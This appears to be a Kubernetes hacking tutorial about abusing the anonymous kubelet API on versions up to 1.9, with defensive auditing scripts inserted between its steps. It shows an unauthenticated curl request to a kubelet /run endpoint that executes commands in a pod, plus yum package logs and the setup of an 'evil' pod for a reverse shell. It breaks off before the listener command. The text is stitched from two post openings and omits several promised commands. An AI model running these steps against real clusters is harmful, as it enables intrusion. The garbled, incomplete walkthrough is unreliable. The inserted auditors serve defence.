Hi everyone, in today's post I am going to explain how to SSH into the worker node where the pod is hosted. To do this you need to have completed part 1 of this tutorial; if you have not seen it yet, please do so before watching this one.
Now that you are inside the hacked pod with an SSH connection, let's try to mount the root volume of the worker node where this pod is running. You should be able to do this as it is enabled by default; if the sysadmin didn't change it, you are good to go. You need this file and the permission to launch pods from inside the hacked pod; again, if that pod is using the default service account you should be able to do it.
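The two conditions the paragraph above relies on, a hostPath volume that exposes the node's filesystem and a pod that still carries the default service account's token, are both visible in the pod manifest. The following is an added example, not code from the original post: a small auditor that reports those conditions for Pod manifests. The manifests it checks are constructed for illustration, and the list of "sensitive" host paths is an assumption you should adapt to your own policy.

```python
"""Audit Pod manifests for a hostPath volume that exposes the node filesystem
and for an auto-mounted default service-account token. Added example, not code
from the original post; the manifests below are constructed for illustration."""
import json

# Node paths that effectively hand over the worker: an assumption made for
# this example, extend it to fit your own policy.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/lib/kubelet", "/var/run/docker.sock")


def _under(path: str, prefix: str) -> bool:
    """True if path equals prefix or lies beneath it ('/' only matches itself)."""
    if prefix == "/":
        return path == "/"
    return path == prefix or path.startswith(prefix + "/")


def audit_pod(pod: dict) -> list:
    """Return a list of finding strings for one Pod manifest given as a dict."""
    findings = []
    spec = pod.get("spec") or {}
    name = (pod.get("metadata") or {}).get("name", "<unnamed>")

    # Map volume name -> host path so each mount can be judged by what it exposes.
    host_paths = {
        v["name"]: (v["hostPath"].get("path") or "/")
        for v in spec.get("volumes") or []
        if "hostPath" in v
    }

    for c in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        for vm in c.get("volumeMounts") or []:
            path = host_paths.get(vm["name"])
            if path is None:
                continue
            norm = "/" + path.strip("/")
            level = "HIGH" if any(_under(norm, p) for p in SENSITIVE_HOST_PATHS) else "MEDIUM"
            findings.append(f"{level}: {name}/{c['name']} mounts node path {norm} at {vm.get('mountPath')}")
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"HIGH: {name}/{c['name']} runs privileged")

    # The post's premise: the default service account token is mounted and, with
    # permissive RBAC, lets code inside the pod create further pods.
    sa = spec.get("serviceAccountName", "default")
    if sa == "default" and spec.get("automountServiceAccountToken", True):
        findings.append(f"MEDIUM: {name} runs as the default service account with its token mounted")
    return findings


# Constructed manifests: the first one resembles what the post describes.
NODE_ROOT_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "node-root"},
    "spec": {
        "containers": [{"name": "shell", "image": "centos",
                        "volumeMounts": [{"name": "host", "mountPath": "/host"}]}],
        "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
    },
}

LOG_READER_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "log-reader"},
    "spec": {
        "serviceAccountName": "log-reader",
        "automountServiceAccountToken": False,
        "containers": [{"name": "tail", "image": "busybox",
                        "volumeMounts": [{"name": "logs", "mountPath": "/logs", "readOnly": True}]}],
        "volumes": [{"name": "logs", "hostPath": {"path": "/var/log/"}}],
    },
}

HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "app"},
    "spec": {
        "serviceAccountName": "app",
        "automountServiceAccountToken": False,
        "containers": [{"name": "app", "image": "app:1.0",
                        "securityContext": {"privileged": False}}],
    },
}

if __name__ == "__main__":
    for pod in (NODE_ROOT_POD, LOG_READER_POD, HARDENED_POD):
        print(json.dumps({pod["metadata"]["name"]: audit_pod(pod)}, indent=2))
```

Run it over the output of `kubectl get pods -A -o json` (each item is one manifest dict) and the pods that could be used the way the post describes are the ones with HIGH findings. A dedicated service account with `automountServiceAccountToken: false` removes the second precondition even where RBAC is still permissive.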
Hello everyone, it's been a while since my last post, mainly because there was nothing interesting to post until now :) I will be posting a series of posts on how to hack Kubernetes, since this is a hot topic at the moment.
By default the kubelet API allows anonymous access: no keys, no password, nothing is needed.
This is what you are going to need to reproduce this:
1) A running Kubernetes <= 1.9; it has been fixed in version 1.10: https://github.com/kubernetes/kubernetes/pull/59666
2) The kubelet API ports, 10255 and 10250, must be exposed to the internet or to your local network.
3) RBAC rules misconfigured or not even present.
4) A cluster to test on; I recommend installing minikube.
5) A container that is not read-only, so you can install stuff; but even if it is read-only, you can get a lot of info from it, like secrets and AWS IAM information.
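Preconditions 1 to 3 above come down to three kubelet settings: whether anonymous requests are accepted, whether authorization is `AlwaysAllow`, and whether the unauthenticated read-only port is open. The following is an added example, not code from the original post: it audits a KubeletConfiguration given as a dict and produces a corrected copy. The configurations are constructed, and the defaults it assumes for absent fields (anonymous on, AlwaysAllow, read-only port 10255) follow the historical kubelet flag defaults; check them against your own version.

```python
"""Audit a KubeletConfiguration for the settings the post's preconditions rely
on and produce a hardened copy. Added example, not code from the original post;
the configurations below are constructed. Assumed defaults for absent fields:
anonymous auth on, authorization AlwaysAllow, read-only port 10255."""
import copy
import json


def kubelet_findings(cfg: dict) -> list:
    """Return finding strings for a KubeletConfiguration given as a dict."""
    findings = []
    anon = (cfg.get("authentication") or {}).get("anonymous") or {}
    if anon.get("enabled", True):  # assumed default: true
        findings.append("authentication.anonymous.enabled is true: unauthenticated callers are accepted")
    mode = (cfg.get("authorization") or {}).get("mode", "AlwaysAllow")  # assumed default
    if mode == "AlwaysAllow":
        findings.append("authorization.mode is AlwaysAllow: any accepted caller may use /run and /exec")
    port = cfg.get("readOnlyPort", 10255)  # assumed default; 0 disables the port
    if port:
        findings.append(f"readOnlyPort {port} serves pod details with no authentication at all")
    return findings


def harden(cfg: dict) -> dict:
    """Return a copy with anonymous auth off, webhook authn/authz on and the read-only port closed.
    Webhook authentication needs the kubelet to be able to call the API server's TokenReview API."""
    out = copy.deepcopy(cfg)
    out.setdefault("authentication", {})
    out["authentication"]["anonymous"] = {"enabled": False}
    out["authentication"]["webhook"] = {"enabled": True}
    out["authorization"] = {"mode": "Webhook"}
    out["readOnlyPort"] = 0
    return out


# Constructed: the weak configuration is the one the post's setup depends on.
WEAK_CONFIG = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": True}, "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
    "readOnlyPort": 10255,
}

if __name__ == "__main__":
    print("weak:", json.dumps(kubelet_findings(WEAK_CONFIG), indent=2))
    fixed = harden(WEAK_CONFIG)
    print("hardened:", json.dumps(fixed, indent=2))
    print("findings after hardening:", kubelet_findings(fixed))
```

The same three settings exist as the `--anonymous-auth`, `--authorization-mode` and `--read-only-port` kubelet flags on clusters that do not use a config file. Closing the read-only port and switching to webhook authorization also requires the API server to be allowed to reach the kubelet (`nodes/proxy` and related RBAC verbs), so roll it out node by node and confirm `kubectl logs` and `kubectl exec` still work.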
So, let's do this. I did this on minikube just to play and prove the concept; that's the easiest way to play with this vulnerability. So go ahead and install minikube, or you can run this on your own cluster.
Once you have minikube installed, you need its IP address; get it with:
angelo@poc-hack:~$ minikube ip
Mine is 192.168.99.100; yours might be different. In order to do the curls below, you are going to need the pod name and the pod id.
So let's launch 2 pods: one with the vulnerable host and another one that will be waiting for our reverse shell.
1) Launch the evil container that will be listening for our reverse shell.
angelo@poc-hack:~$ kubectl run evil --image=centos -it /bin/bash
2) Launch the hacked container that we will use to hack into.
angelo@poc-hack:~$ kubectl run hacked --image=centos -it /bin/bash
The pod name is "hacked" and the pod id you can get with:
angelo@poc-hack:~$ kubectl get pods
NAME                      READY   STATUS    RESTARTS   AGE
hacked-65d6998b6c-rgl28   1/1     Running   1          48m
evil-7d7fff7d4c-5lmfz     1/1     Running   1          1
So in my case, the pod name is "hacked" and the pod id is "hacked-65d6998b6c-rgl28".
If you are wondering how you are going to get this information from outside, this is how:
In my case, that command would translate to 192.168.99.100 because that's my minikube IP; in a real-case scenario, that would be the IP of the master node. And this is how to get the pod names:
From the command above you can get the pod id and name.
Now let's get into the interesting part.
Open 3 tabs in your terminal: one with a shell on the hacked container, one on the evil container, and another one where you are going to run lots of curl commands.
The first thing you are going to do is to create a test file. Run this on your localhost.
Alright, now that we know that everything is working, let's install nc on that hacked box so we can launch a reverse shell:
1) Install nc in case it's not there yet.
angelo@poc-hack:~$ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=yum install -y nc"
Loaded plugins: fastestmirror, ovl
Loading mirror speeds from cached hostfile
* base: mirror.freethought-internet.co.uk
* extras: mirrors.coreix.net
* updates: mirrors.coreix.net
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
========================================================================
Package Arch Version Repository Size
========================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Transaction Summary
========================================================================
Install 1 Package
Total download size: 201 k
Installed size: 414 k
Downloading packages:
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Complete!
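The curl above only works because the kubelet on that node answers port 10250 without credentials and keeps the read-only port open. The following is an added example, not code from the original post: a check you can run against your own nodes that reports which of them would accept such a request. The fetch function is injectable so the check runs offline here against constructed responses; the probed path (`/pods`) and the 10255/10250 port pair are assumptions taken from the post's setup.

```python
"""Report nodes whose kubelet answers unauthenticated requests. Added example,
not code from the original post. The port pair and the /pods path are
assumptions; the responses at the bottom are constructed for an offline run."""
import ssl
import urllib.error
import urllib.request

READ_ONLY_PORT = 10255
AUTH_PORT = 10250


def http_status(url: str, timeout: float = 5.0):
    """GET url with no credentials; return the HTTP status, or None if unreachable.
    Certificate checks are disabled on purpose: kubelets use self-signed certs and
    this test is about authentication, not server identity."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    try:
        with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except (urllib.error.URLError, OSError):
        return None


def check_kubelet(host: str, fetch=http_status, path: str = "/pods") -> dict:
    """Classify one node. fetch(url) -> status or None, so tests can substitute a fake."""
    ro = fetch(f"http://{host}:{READ_ONLY_PORT}{path}")
    auth = fetch(f"https://{host}:{AUTH_PORT}{path}")
    return {
        "host": host,
        "read_only_port_open": ro == 200,
        "anonymous_api_access": auth == 200,
        "api_port_reachable": auth is not None,
        # 401/403 is what a correctly configured kubelet returns without credentials.
        "ok": ro != 200 and auth in (401, 403, None),
    }


def report(hosts, fetch=http_status) -> list:
    """Return only the nodes that need attention."""
    bad = []
    for host in hosts:
        result = check_kubelet(host, fetch)
        if not result["ok"]:
            bad.append(result)
    return bad


# Constructed responses standing in for two nodes: one left at the defaults the
# post relies on, one hardened (read-only port closed, anonymous access refused).
FAKE_RESPONSES = {
    "http://10.0.0.11:10255/pods": 200,
    "https://10.0.0.11:10250/pods": 200,
    "http://10.0.0.12:10255/pods": None,
    "https://10.0.0.12:10250/pods": 401,
}


def fake_fetch(url: str, timeout: float = 5.0):
    return FAKE_RESPONSES.get(url)


if __name__ == "__main__":
    for result in report(["10.0.0.11", "10.0.0.12"], fetch=fake_fetch):
        print(result)
```

Feed `report()` the node addresses from `kubectl get nodes -o wide` with the default `http_status` fetcher; a node that shows up in the output is one where the `cmd=` request above would have been accepted, and the fix is the kubelet configuration change (anonymous auth off, webhook authorization, read-only port 0) rather than a firewall rule alone.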
2) Do the same for the evil container (execute this on your localhost):
[root@evil-ccb5dd4fc-tqf9s /]# yum install -y nc net-tools
Loaded plugins: fastestmirror, ovl
base | 3.6 kB 00:00:00
extras | 3.4 kB 00:00:00
updates | 3.4 kB 00:00:00
(1/4): extras/7/x86_64/primary_db | 185 kB 00:00:00
(2/4): base/7/x86_64/group_gz | 156 kB 00:00:02
(3/4): updates/7/x86_64/primary_db | 6.9 MB 00:00:09
(4/4): base/7/x86_64/primary_db | 5.7 MB 00:00:26
Determining fastest mirrors
* base: mirror.econdc.com
* extras: mirrors.coreix.net
* updates: mirror.econdc.com
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Processing Dependency: libpcap.so.1()(64bit) for package: 2:nmap-ncat-6.40-7.el7.x86_64
--> Running transaction check
---> Package libpcap.x86_64 14:1.5.3-9.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=================================================================================================================================================================
Package Arch Version Repository Size
=================================================================================================================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Installing for dependencies:
libpcap x86_64 14:1.5.3-9.el7 base 138 k
Transaction Summary
=================================================================================================================================================================
Install 1 Package (+1 Dependent package)
Total download size: 338 k
Installed size: 731 k
Downloading packages:
warning: /var/cache/yum/x86_64/7/base/packages/nmap-ncat-6.40-7.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for nmap-ncat-6.40-7.el7.x86_64.rpm is not installed
(1/2): nmap-ncat-6.40-7.el7.x86_64.rpm | 201 kB 00:00:00
(2/2): libpcap-1.5.3-9.el7.x86_64.rpm | 138 kB 00:00:04
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Total 82 kB/s | 338 kB 00:00:04
Retrieving key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Importing GPG key 0xF4A80EB5:
Userid : "CentOS-7 Key (CentOS 7 Official Signing Key) "
Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
Package : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 14:libpcap-1.5.3-9.el7.x86_64 1/2
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 2/2
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/2
Verifying : 14:libpcap-1.5.3-9.el7.x86_64 2/2
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Dependency Installed:
libpcap.x86_64 14:1.5.3-9.el7
Complete!
3) Prepare the reverse shell connection on your evil host (execute this on your evil container; you need to get its IP address so you can use it on the other container to connect to this one):